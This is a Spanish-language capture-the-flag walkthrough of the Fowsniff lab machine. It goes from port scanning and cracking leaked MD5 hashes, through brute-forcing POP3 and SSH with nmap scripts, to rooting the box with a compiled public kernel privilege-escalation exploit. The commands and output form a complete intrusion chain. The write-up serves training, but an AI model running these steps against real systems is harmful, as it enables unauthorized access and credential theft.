fowsniff - danielcastropalomares/security GitHub Wiki
En un primer escaneo encontramos los siguientes puertos:
root@kali:~# nmap -p- 172.31.255.133
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-09 18:34 CET
Nmap scan report for 172.31.255.133
Host is up (0.000068s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
143/tcp open imap
MAC Address: 08:00:27:66:85:17 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 4.61 seconds
root@kali:~# nmap -A 172.31.255.133
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-09 18:34 CET
Nmap scan report for 172.31.255.133
Host is up (0.00047s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
| 256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_ 256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fowsniff Corp - Delivering Solutions
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES TOP AUTH-RESP-CODE CAPA UIDL PIPELINING SASL(PLAIN) USER
143/tcp open imap Dovecot imapd
|_imap-capabilities: ENABLE AUTH=PLAINA0001 OK post-. login LITERAL+ ID listed have SASL-IR more IMAP4rev1 capabilities . login-REFERRALS IDLE Pre-. login
MAC Address: 08:00:27:66:85:17 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 172.31.255.133
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.46 seconds
Si accedemos a la web, encontramos en un apartado lo siguiente:
The attackers were also able to hijack our official @fowsniffcorp Twitter account. All of our official tweets have been deleted and the attackers may release sensitive information via this medium. We are working to resolve this at soon as possible.
Si accedemos a twitter encontramos la cuenta y el siguiente tweet:
https://twitter.com/FowsniffCorp/status/972208944285388800
Que nos lleva a un pastebin.com:
https://pastebin.com/NrAqVeeX
https://pastebin.com/raw/NrAqVeeX
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e
Con johnripper descrsenciptamos los hash:
root@kali:/tmp# john --format=raw-md5 --wordlist=rockyou.txt hash
Using default input encoding: UTF-8
Loaded 9 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
scoobydoo2 (?)
orlando12 (?)
apples01 (?)
skyler22 (?)
mailcall (?)
07011972 (?)
carp4ever (?)
bilbo101 (?)
8g 0:00:00:24 DONE (2018-12-11 20:31) 0.3304g/s 592481p/s 592481c/s 1515KC/s ..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Los resultado los podemos consultar en el siguiente directorio:
/root/.john/john.pot
$dynamic_0$90dc16d47114aa13671c697fd506cf26:scoobydoo2
$dynamic_0$4d6e42f56e127803285a0a7649b5ab11:orlando12
$dynamic_0$1dc352435fecca338acfd4be10984009:apples01
$dynamic_0$19f5af754c31f1e2651edde9250d69bb:skyler22
$dynamic_0$8a28a94a588a95b80163709ab4313aa4:mailcall
$dynamic_0$f7fd98d380735e859f8b2ffbbede5a7e:07011972
$dynamic_0$0e9588cb62f4b6f27e33d449e2ba0b3b:carp4ever
$dynamic_0$ae1644dac5b77c0cf51e0d26ad6d7e56:bilbo101
Para no tener que ir probando las credenciales una a una, vamos utilizar el script de nmap para probar las credenciales obtenidas. Crearemos dos listas, una con los usuarios y otra con los passwords:
root@kali:~# cat /tmp/userdb
mauer@fowsniff
mustikka@fowsniff
tegel@fowsniff
baksteen@fowsniff
seina@fowsniff
stone@fowsniff
mursten@fowsniff
parede@fowsniff
sciana@fowsniff
mauer
mustikka
tegel
baksteen
seina
stone
mursten
parede
sciana
root@kali:~# cat /tmp/passwd
mailcall
bilbo101
apples01
skyler22
scoobydoo2
carp4ever
orlando12
07011972
Y ahora ejecutamos el nmap:
root@kali:~# nmap -sV --script pop3-brute -script-args passdb=/tmp/passwd,userdb=/tmp/userdb 172.31.255.133
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
| pop3-brute:
| Accounts:
| seina:scoobydoo2 - Valid credentials
|_ Statistics: Performed 159 guesses in 117 seconds, average tps: 1.3
143/tcp open imap Dovecot imapd
Ahora vamos a conectarnos vía telnet al pop3:
root@kali:~# telnet 172.31.255.133 110
Trying 172.31.255.133...
Connected to 172.31.255.133.
Escape character is '^]'.
+OK Welcome to the Fowsniff Corporate Mail Server!
USER seina
+OK
PASS scoobydoo2
+OK Logged in.
Vemos que hay dos mensajes:
LIST
+OK 2 messages:
1 1622
2 1280
Leemos el primer mail,si nos fijamos, este mail va destinado a todos los usuario de las cuentas de correo anteriores. Así que parece que el admin ha cambiado el password a todos los usuarios del sistema, por el "S1ck3nBluff+secureshell".
retr 1
+OK 1622 octets
Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)
Dear All,
A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.
We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.
This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via
the SSH protocol.
The temporary password for SSH is "S1ck3nBluff+secureshell"
Como no sabemos qué usuario ha cambiado el password S1ck3nBluff+secureshell, vamos a enumerar los usuarios y después probar fuerza bruta por SSH:
msf auxiliary(scanner/ssh/ssh_enumusers) > exploit
[*] 172.31.255.133:22 - SSH - Using malformed packet technique
[*] 172.31.255.133:22 - SSH - Starting scan
[+] 172.31.255.133:22 - SSH - User 'mauer' found
[+] 172.31.255.133:22 - SSH - User 'mustikka' found
[+] 172.31.255.133:22 - SSH - User 'tegel' found
[+] 172.31.255.133:22 - SSH - User 'baksteen' found
[+] 172.31.255.133:22 - SSH - User 'seina' found
[+] 172.31.255.133:22 - SSH - User 'stone' found
[+] 172.31.255.133:22 - SSH - User 'mursten' found
[+] 172.31.255.133:22 - SSH - User 'parede' found
[+] 172.31.255.133:22 - SSH - User 'sciana' found
Y ahora probamos el password anterior contra todos los usuarios del sistema:
root@kali:~# cat /tmp/passwd1
S1ck3nBluff+secureshell
root@kali:~# nmap -sV --script ssh-brute -script-args passdb=/tmp/passwd1,userdb=/tmp/userdb 172.31.255.133
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-brute:
| Accounts:
| baksteen:S1ck3nBluff+secureshell - Valid credentials
|_ Statistics: Performed 18 guesses in 7 seconds, average tps: 2.6
Ya tenemos acceso al sistema con el usuario baksteen:
root@kali:~# ssh [email protected]
[email protected]'s password:
_____ _ __ __
:sdddddddddddddddy+ | ___|____ _____ _ __ (_)/ _|/ _|
:yNMMMMMMMMMMMMMNmhsso | |_ / _ \ \ /\ / / __| '_ \| | |_| |_
.sdmmmmmNmmmmmmmNdyssssso | _| (_) \ V V /\__ \ | | | | _| _|
-: y. dssssssso |_| \___/ \_/\_/ |___/_| |_|_|_| |_|
-: y. dssssssso ____
-: y. dssssssso / ___|___ _ __ _ __
-: y. dssssssso | | / _ \| '__| '_ \
-: o. dssssssso | |__| (_) | | | |_) | _
-: o. yssssssso \____\___/|_| | .__/ (_)
-: .+mdddddddmyyyyyhy: |_|
-: -odMMMMMMMMMMmhhdy/.
.ohdddddddddddddho: Delivering Solutions
**** Welcome to the Fowsniff Corporate Server! ****
---------- NOTICE: ----------
* Due to the recent security breach, we are running on a very minimal system.
* Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.
New release '18.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Tue Mar 13 16:55:40 2018 from 192.168.7.36
baksteen@fowsniff:~$
El usuario no tiene permisos de sudo:
baksteen@fowsniff:~$ sudo -l
[sudo] password for baksteen:
Sorry, user baksteen may not run sudo on fowsniff.
Buscamos binarios que tengan permisos de SUID:
baksteen@fowsniff:~$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/fusermount
/bin/umount
/bin/ping
/bin/su
/bin/ntfs-3g
/bin/ping6
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/sudo
/usr/bin/chsh
Intentamos listar los directorios del resto de usuarios por si aparece alguna información:
baksteen@fowsniff:/home$ du -h
du: cannot read directory './seina': Permission denied
4.0K ./seina
du: cannot read directory './stone': Permission denied
4.0K ./stone
du: cannot read directory './mustikka': Permission denied
4.0K ./mustikka
du: cannot read directory './parede': Permission denied
4.0K ./parede
du: cannot read directory './tegel': Permission denied
4.0K ./tegel
4.0K ./baksteen/.cache
4.0K ./baksteen/Maildir/tmp
4.0K ./baksteen/Maildir/cur
8.0K ./baksteen/Maildir/new
32K ./baksteen/Maildir
76K ./baksteen
du: cannot read directory './mursten': Permission denied
4.0K ./mursten
du: cannot read directory './sciana': Permission denied
4.0K ./sciana
du: cannot read directory './mauer': Permission denied
4.0K ./mauer
112K .
Vamos a probar de escalar privilegios mediante algún exploit con el kernel:
baksteen@fowsniff:~$ uname -a
Linux fowsniff 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
Buscamos esa versión en concreto:
searchsploit linux kernel 4.4
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/4429
Como no tiene instalado el gcc en la maquina victima, vamos a compilarlo en nuestra maquina localmente y después lo subimos:
root@kali:/tmp# gcc /usr/share/exploitdb/exploits/linux/local/44298.c -o /tmp/44298 -pthread
root@kali:/tmp# scp /tmp/44298 [email protected]:/tmp/
Lo ejecutamos y ya tenemos root:
baksteen@fowsniff:/tmp$ ./44298
task_struct = ffff8800166a7000
uidptr = ffff88001f33f9c4
spawning root shell
root@fowsniff:/tmp# id
uid=0(root) gid=0(root) groups=0(root),100(users),1001(baksteen)
root@fowsniff:/root# cat flag.txt
___ _ _ _ _ _
/ __|___ _ _ __ _ _ _ __ _| |_ _ _| |__ _| |_(_)___ _ _ __| |
| (__/ _ \ ' \/ _` | '_/ _` | _| || | / _` | _| / _ \ ' \(_-<_|
\___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)
|___/
(_)
|--------------
|&&&&&&&&&&&&&&|
| R O O T |
| F L A G |
|&&&&&&&&&&&&&&|
|--------------
|
|
|
|
|
|
---
Nice work!
This CTF was built with love in every byte by @berzerk0 on Twitter.
Special thanks to psf, @nbulischeck and the whole Fofao Team.